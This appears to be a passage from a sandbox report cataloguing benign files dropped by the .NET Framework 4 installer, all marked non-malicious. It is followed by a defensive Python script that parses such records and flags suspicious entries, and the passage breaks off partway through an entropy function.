                                                                                                                                                                  SHA-256:C405AB9949C10619742AF1AF153521FFD85C16821324C16233B025F982A98CAD
                                                                                                                                                                  SHA-512:709A522477121EE32152DBE7F90EE4B597621761854B55A791C07C9521FFB899A21C0B84351A68AC3A583B43A91AC5164EF34259D153D21B47C404B4313893B3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1040\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs20 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT SUPPLEMENTARI\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK 4 PER IL SISTEMA OPERATIVO MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE PER IL SISTEMA OPERATIVO MICROSOFT WINDOWS\par..E RELATIVI LANGUAGE PACK \f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\b0\f0 Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) concede in licenza al licenziatario il presente supplemento.\b \b0 Qualora il licenziatario sia autorizzato a utilizzare il software per il sistema operativo Microsoft Windows (per il qua
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (538), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):68226
                                                                                                                                                                  Entropy (8bit):4.416259780276574
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wVzQOXe7GoXHoMIpYnxKJMlvWy0aO8rRnfJGnav:3QOu7GlCnkJMlvWy0aO8rRnfJ5
                                                                                                                                                                  MD5:64FFA6FF8866A15AFF326F11A892BEAD
                                                                                                                                                                  SHA1:378201477564507A481BA06EA1BC0620B6254900
                                                                                                                                                                  SHA-256:7570390094C0A199F37B8F83758D09DD2CECD147132C724A810F9330499E0CBF
                                                                                                                                                                  SHA-512:EA5856617B82D13C9A312CB4F10673DBC4B42D9AC5703AD871E8BDFCC6549E262E61288737AB8EBCF77219D24C0822E7DACF043D1F2D94A97C9B7EC0A5917EF2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."..0.0.0.0.0.0o0.N.c.0.0.0g0.[L.g0M0~0[0.0.0s.0}k0d0D0f0o0.0&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;..0.0.0.0 ..0.0.0&.l.t.;./.A.&.g.t.;..0.SgqW0f0O0`0U0D0.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. ..0.0.0
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):15704
                                                                                                                                                                  Entropy (8bit):5.929554826924656
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:Cg0rjUfwtW1+/FuZhS5CSJk/lhAW5kEW1QKPnEtObMacxc8hjeyveCXPX:5hC7mS53JkNSW5kEW1LXci2jpvJ
                                                                                                                                                                  MD5:278FD7595B580A016705D00BE363612F
                                                                                                                                                                  SHA1:89A299A9ABECB624C3606267371B7C07B74B3B26
                                                                                                                                                                  SHA-256:B3ECD3AEA74D0D97539C4971C69F87C4B5FE478FC42A4A31F7E1593D1EBA073F
                                                                                                                                                                  SHA-512:838D23D35D8D042A208E8FA88487CD1C72DA48F336157D03B9549DD55C75DA60A83F6DD2B3107EB3E5A24F3FAD70AE1629ACC563371711117C3C3E299B59D838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!........."...............................................@............@.......................................... ..h............&..X............................................................................................text...G...........................@..@.rsrc.... ... ... ..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 932, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10125
                                                                                                                                                                  Entropy (8bit):4.144479793761895
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:tEf13/qC2+PCsANROmuuU8EhZFJEj2VQoKOwyWAOxzpOh+uqaJgt2:tBtQoCnGDzhuqz2
                                                                                                                                                                  MD5:75CE7D721BDB78F1020ACF2B206B1859
                                                                                                                                                                  SHA1:CC0418DE8806811D21B19005BC5DB0092767F340
                                                                                                                                                                  SHA-256:2ABDC7246E95E420B4E66CC3C07ACDB56FF390BCD524E0D8525D5BF345030A5A
                                                                                                                                                                  SHA-512:FAFAC863DC825FC0B104751FE62CDA2C43048683F9D7E45659784206EA67F1AA98EA282AFC2A3A4BA287D03F73B21EC1E2F8C02F5D036CE96CAEFD851A5389E5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fmodern\fprq2\fcharset128 \'82\'6c\'82\'72 \'82\'6f\'83\'53\'83\'56\'83\'62\'83\'4e;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(<?[\'5c\'7b\'81\'92\'5c\'81\'e1\'81\'65\'81\'67}{\*\fchars !%'),.:\'3b>?]\'7d\'81\'91\'81\'8b\'81\'45\'81\'e2\'81\'66\'81\'68\'81\'f1}}..\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1041\b\f0\fs20\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67\lang1033\f1 \lang1041\f0\'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41\'92\'c7\'89\'c1\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\lang1033\f2\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\f1 MICROSOFT WINDOWS \lang1041\f0\'83\'49\'83\'79\'83\'8c\'81\'5b\'83\'65\'83\'42\'83\'93\'83\'4f\lang1033\f1 \lang1041\
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (509), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):65238
                                                                                                                                                                  Entropy (8bit):4.384411743704147
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wsx1QzSzXLGKgooDQA0pb5ywW4JSUQvEQzH/dv:egtqpb5yw5Jg
                                                                                                                                                                  MD5:78C16DA54542C9ED8FA32FED3EFAF10D
                                                                                                                                                                  SHA1:AD8CFE972C8A418C54230D886E549E00C7E16C40
                                                                                                                                                                  SHA-256:E3E3A2288FF840AB0E7C5E8F7B4CFB1F26E597FB17CFC581B7728116BD739ED1
                                                                                                                                                                  SHA-512:D9D7BB82A1D752A424BF81BE3D86ABEA484ACBB63D35C90A8EE628E14CF34A7E8A02F37D2EA82AA2CE2C9AA4E8416A7A6232C632B7655F2033C4AAAB208C60BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".8.X. .......... .$.X. ...\.....D. ....`. ... ........ ...8.\. .....@. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;..... ..... ...|.&.l.t.;./.A.&.g.t.;.D. .8.p.X.....$..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):15192
                                                                                                                                                                  Entropy (8bit):5.9622226182057325
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:Hpix6f+jYxzekdPKNS0N7gVCAMWpCeWRQKPnEtObMacxc8hjeyveCXmo+:3ibMj0lgRMWpCeWRLXci2jpv8o+
                                                                                                                                                                  MD5:FCFD69EC15A6897A940B0435439BF5FC
                                                                                                                                                                  SHA1:6DE41CABDB45294819FC003560F9A2D1E3DB9A7B
                                                                                                                                                                  SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
                                                                                                                                                                  SHA-512:4DC3580B372CEE1F4C01569BAEA8CD0A92BC613648DB22FF1855920E47387A151964B295A1126597B44BB0C596E8757B1FCF47CDA010F9BBB15A88F97F41B8BF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!......... ...............................................@......v.....@.......................................... ...............$..X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 949, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12687
                                                                                                                                                                  Entropy (8bit):4.39170120937692
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:MUf0PVF4MjeKojIfE6wK+b/mIr4tIAcAIce5rD6O1IuonKZim+dfNAW6qUK84Zn+:aK0wB/Tr4TmckIuCm+TAWdUN/re2
                                                                                                                                                                  MD5:A3B318528E286EC387E81934E5D3B081
                                                                                                                                                                  SHA1:CEDCC08D008E21C0E88EEF8354DAB8CFF2EF51AD
                                                                                                                                                                  SHA-256:2954EDB51628942A37A9BF58DA628932638C35ED61744892E42623FE4CCD06A0
                                                                                                                                                                  SHA-512:3544D9BE654C859CDE2B9CD8614C5ABED89E488DFEE2F51AB92A509873DC504942E375388D12379DE9D29DEEDE662667F8CC4BC6D2DCD50C5AC865CE6C44352D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg949\deff0\deflang1033\deflangfe1042{\fonttbl{\f0\fswiss\fprq2\fcharset0 Arial;}{\f1\froman\fprq2\fcharset129 \'b9\'d9\'c5\'c1;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}{\info{\horzdoc}{\*\lchars $(<?[\'5c\'7b\'a1\'cc\'a1\'cd\'a1\'ec\'a1\'ae\'a1\'b0}{\*\fchars !%'),.:\'3b>?]\'7d\'a1\'cb\'a1\'c6\'a1\'ed\'a1\'af\'a1\'b1}}..\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\b\f0\fs28 MICROSOFT \lang1042\f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\lang1033\f0 \lang1042\f1\'c3\'df\'b0\'a1\lang1033\f0 \lang1042\f1\'bb\'e7\'bf\'eb\'b1\'c7\lang1033\f0 \lang1042\f1\'b0\'e8\'be\'e0\'bc\'ad\lang1033\f0\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\fs20 MICROSOFT WINDOWS \lang1042\f1\'bf\'ee\'bf\'b5\lang1033\f0 \lang1042\f1\'c3\'bc\'c1\'a6\'bf\'eb\lang1033\f0 MICROSOFT .NET FRAMEWORK 4\par..MICROSOFT WINDOWS \lang1042\f1\'bf\'ee\'bf\'b5\lang1033\f0 \lang1042\f1\'c3\'bc\'c1\'a6\'bf\'eb\lang1033\f0 MICROSOFT .N
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (658), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):79634
                                                                                                                                                                  Entropy (8bit):3.5656146816718155
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wCsfDNzgDbRiRVqxdYRF405vYtyVB1HaAzTGZUeJvuQFKhlQ5gwJBKQauJf1tSY:jbZKbRyVqb82IB+GlQ5gwJBzauJzkA
                                                                                                                                                                  MD5:6506B4E64EBF6121997FA227E762589F
                                                                                                                                                                  SHA1:71BC1478C012D9EC57FC56A5266DD325B7801221
                                                                                                                                                                  SHA-256:415112AE783A87427C2FADD7B010ADE4F1A7C23B27E4B714B7B507C16B572A1C
                                                                                                                                                                  SHA-512:39024EA9D42352F7C1BD6FEFE0574054ECEB4059F773CFAEB26C42FAADA2540AE95FB34718D30CCB6DA157D2597F80D12A024461FBD0E8D510431BA6FFA81EC2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".S.e.t.u.p. .k.a.n. .n.i.e.t. .w.o.r.d.e.n. .u.i.t.g.e.v.o.e.r.d. .i.n. .d.e. .c.o.m.p.a.t.i.b.i.l.i.t.e.i.t.s.m.o.d.u.s... .R.a.a.d.p.l.e.e.g. .h.e.t. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.L.e.e.s.m.i.j.-.b.e.s.t.a.n.d.&.l.t.;./.A.&.g.t.;. .v.o.o.r. .m.e.e.r. .i.n.f.o.r.m.a.t.i.e..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):19288
                                                                                                                                                                  Entropy (8bit):5.101791972320269
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:3124Y0WDDkowwX8OZjv1t2WlLeWvLXci2jpvc:lYZhzMi2jpvc
                                                                                                                                                                  MD5:76D6E9F15D842E6A56EE42C9C5CCABCA
                                                                                                                                                                  SHA1:36E6FA7C032F69DEA2C34B5934AC556AAE738CBB
                                                                                                                                                                  SHA-256:A961DE62DA74B05EAF593BB78A4A5A4C5586FE2D0D4A45D99675D03E7F01D7C5
                                                                                                                                                                  SHA-512:F9E04AA073EBF98BDD13F6A0A9214DDA42CD5FDFEC24873CF171B77D31408CA6698BF0C9D931A93BDD7A54FE55A9E6394F2C8050C7E847455E4A36585E36D6EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........0...............................................P......ky....@.......................................... ...,...........4..X............................................................................................text...G...........................@..@.rsrc....0... ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3546
                                                                                                                                                                  Entropy (8bit):5.203062637938479
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:rTBfrnjTsVT08DfQhtJlIcm3wEM8LPMpDlGu3x+O0H+Ozo+SBT+OZt6S2:ZfLltGwEMAPOkukO0eONNOT2
                                                                                                                                                                  MD5:305AE79EC7D0E8D1F826D70D7D469BB4
                                                                                                                                                                  SHA1:BBE8FFD83FCA6C013A20CDEE6EA0AFFD988C4815
                                                                                                                                                                  SHA-256:69537AEF05EDFB55EC32897B3DD59724A825FDDECCD92BDD5E8840CB92B1B383
                                                                                                                                                                  SHA-512:A7368CEC366E8F717F3FD51FA71133A02C5E7B44D095B849320E15F8D95DC1A58AB977FA9A4C1633FCD1AD82D929FF8FB2271C816BE8B2B8892D7389E3E3EACD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\ltrpar\nowidctlpar\sb120\sa120\lang1043\b\f0\fs20 AANVULLENDE LICENTIEVOORWAARDEN VOOR MICROSOFT-SOFTWARE\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \ltrpar\nowidctlpar\sb120\sa120\lang1043\f0 MICROSOFT .NET FRAMEWORK 4 VOOR HET BESTURINGSSYSTEEM MICROSOFT WINDOWS\lang1033\f1\par..\lang1043\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE VOOR HET BESTURINGSSYSTEEM MICROSOFT WINDOWS \par..EN GERELATEERDE TAALPAKKETTEN\lang1033\f1\par..\pard\ltrpar\nowidctlpar\sb120\sa120\lang1043\b0\f0 Microsoft Corporation (of, afhankelijk uw locatie, een van haar gelieerde ondernemingen) geeft dit supplement aan u in licentie.\lang1033\b \lang1043\b0 Als u een licentie hebt voor het gebruik van Microsoft Windows
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (653), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):79296
                                                                                                                                                                  Entropy (8bit):3.5898407770439955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:4wn2IhI4z6T1sHCqeHveRWUw+KbGpK+9C/E6b2NJBf2OEuv:V9hI4z6T1siqeHveRhAo9CM6b2NJBuOD
                                                                                                                                                                  MD5:120104FA24709C2A9D8EFC84FF0786CD
                                                                                                                                                                  SHA1:B513FA545EFAE045864D8527A5EC6B6CEBE31BB9
                                                                                                                                                                  SHA-256:516525636B91C16A70AEF8D6F6B424DC1EE7F747B8508B396EE88131B2BB0947
                                                                                                                                                                  SHA-512:1EA8EB2BE9D5F4EF6F1F2C0D90CB228A9BB58D7143CCAFE77E18CE52EC4ACA25DDE0BA18430FD4D3D7962D079CCBE7E2552B2C7090361E03C6FDFB7C2B9C7325
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".I.n.s.t.a.l.l.a.s.j.o.n.s.p.r.o.g.r.a.m.m.e.t. .k.a.n. .i.k.k.e. .k.j...r.e. .i. .k.o.m.p.a.t.i.b.i.l.i.t.e.t.s.m.o.d.u.s... .H.v.i.s. .d.u. .v.i.l. .h.a. .m.e.r. .i.n.f.o.r.m.a.s.j.o.n.,. .s.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.V.i.k.t.i.g.-.f.i.l.e.n.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17752
                                                                                                                                                                  Entropy (8bit):5.209166644217636
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:cNeu+Oeu+Oeu+rW56qxYBlgFAcUm/rW9eWoLXci2jpv72:TIxYBegm/WgMi2jpv72
                                                                                                                                                                  MD5:BACEA57A781C43738A3B065103479BB5
                                                                                                                                                                  SHA1:45E277CC370150293252535D5371B2C0F79B4874
                                                                                                                                                                  SHA-256:8B372354A54643F1159FAB562D0F2DFE21F08A3D67DBB7337242846316D3BEC4
                                                                                                                                                                  SHA-512:CD0BB774D1373A7B735AE9A867387527DAB28D7635B5DE881F92B66ECD87DA4E8F4605F3DF093294CA3060F993220472D3C926780BEB57BF3E90ECC081F0F1E1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............{%......{".....Rich............................PE..L......K.........."!.........*...............................................P.......H....@.......................................... ..t'..............X............................................................................................text...G...........................@..@.rsrc....0... ...(..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
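The records above are flat key:value dumps, and a real dropped-file list for a .NET installer runs to dozens of them. The Python below is an added example (not Joe Sandbox code) that parses records in that layout, flags any entry with a malicious verdict, a non-zero antivirus detection, or a high-entropy PE, and recomputes the bits-per-byte figure that the "Entropy (8bit)" column reports. The first two embedded records copy values from the DLL and the code-page-949 RTF entries above (previews omitted); the third record, its path and all-zero hashes, and the 7.0 bits/byte packing threshold are constructed assumptions for the example, not data from this report.

```python
"""Parse Joe Sandbox 'dropped file' records and triage them offline.

Added example, not sandbox tooling. Record layout mirrors the report;
the third record and PACKED_ENTROPY are assumptions made for the demo.
"""
import math
import re
from collections import Counter

# Constructed excerpt: records 1 and 2 copy values from the report above
# (previews omitted); record 3 is invented to exercise the flagging path.
SAMPLE_RECORDS = """\
Process:C:\\ProgramData\\dotNetFx40_Client_setup.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):15192
Entropy (8bit):5.9622226182057325
Encrypted:false
MD5:FCFD69EC15A6897A940B0435439BF5FC
SHA-256:90F377815E3C81FC9AE5F5B277257B82811417CA3FFEACD73BAB530061B3BE45
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\\ProgramData\\dotNetFx40_Client_setup.exe
File Type:Rich Text Format data, version 1, ANSI, code page 949, default language ID 1033
Category:dropped
Size (bytes):12687
Entropy (8bit):4.39170120937692
Encrypted:false
MD5:A3B318528E286EC387E81934E5D3B081
SHA-256:2954EDB51628942A37A9BF58DA628932638C35ED61744892E42623FE4CCD06A0
Malicious:false
Process:C:\\Users\\user\\AppData\\Roaming\\example.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):40960
Entropy (8bit):7.62
Encrypted:true
MD5:00000000000000000000000000000000
SHA-256:0000000000000000000000000000000000000000000000000000000000000000
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 87%
"""

# Assumed packer heuristic in bits per byte; the sandbox's own cutoff for
# its "Encrypted" flag is not stated in the report.
PACKED_ENTROPY = 7.0


def parse_records(text):
    """Split the flat key:value dump into one dict per dropped file.

    A new record starts at every 'Process:' line; bullet lines under
    'Antivirus:' are collected as integer detection percentages.
    """
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()  # the report's leading indentation is noise
        if not line:
            continue
        if line.startswith("Process:"):
            current = {"av": []}
            records.append(current)
        if current is None:
            continue  # stray text before the first record
        if line.startswith("•"):
            m = re.search(r"Detection:\s*(\d+)%", line)
            if m:
                current["av"].append(int(m.group(1)))
            continue
        key, sep, value = line.partition(":")  # first colon only: paths keep theirs
        if sep:
            current[key.strip()] = value.strip()
    return records


def triage(records):
    """Return (sha256, reasons) for every record an analyst should open."""
    findings = []
    for r in records:
        reasons = []
        if r.get("Malicious", "").lower() == "true":
            reasons.append("sandbox verdict: malicious")
        if any(pct > 0 for pct in r["av"]):
            reasons.append("AV detection %d%%" % max(r["av"]))
        entropy = float(r.get("Entropy (8bit)", 0))
        is_pe = r.get("File Type", "").startswith("PE32")
        if is_pe and entropy >= PACKED_ENTROPY:
            reasons.append("high-entropy PE (%.2f), possibly packed" % entropy)
        if reasons:
            findings.append((r.get("SHA-256"), reasons))
    return findings


def shannon_entropy(data):
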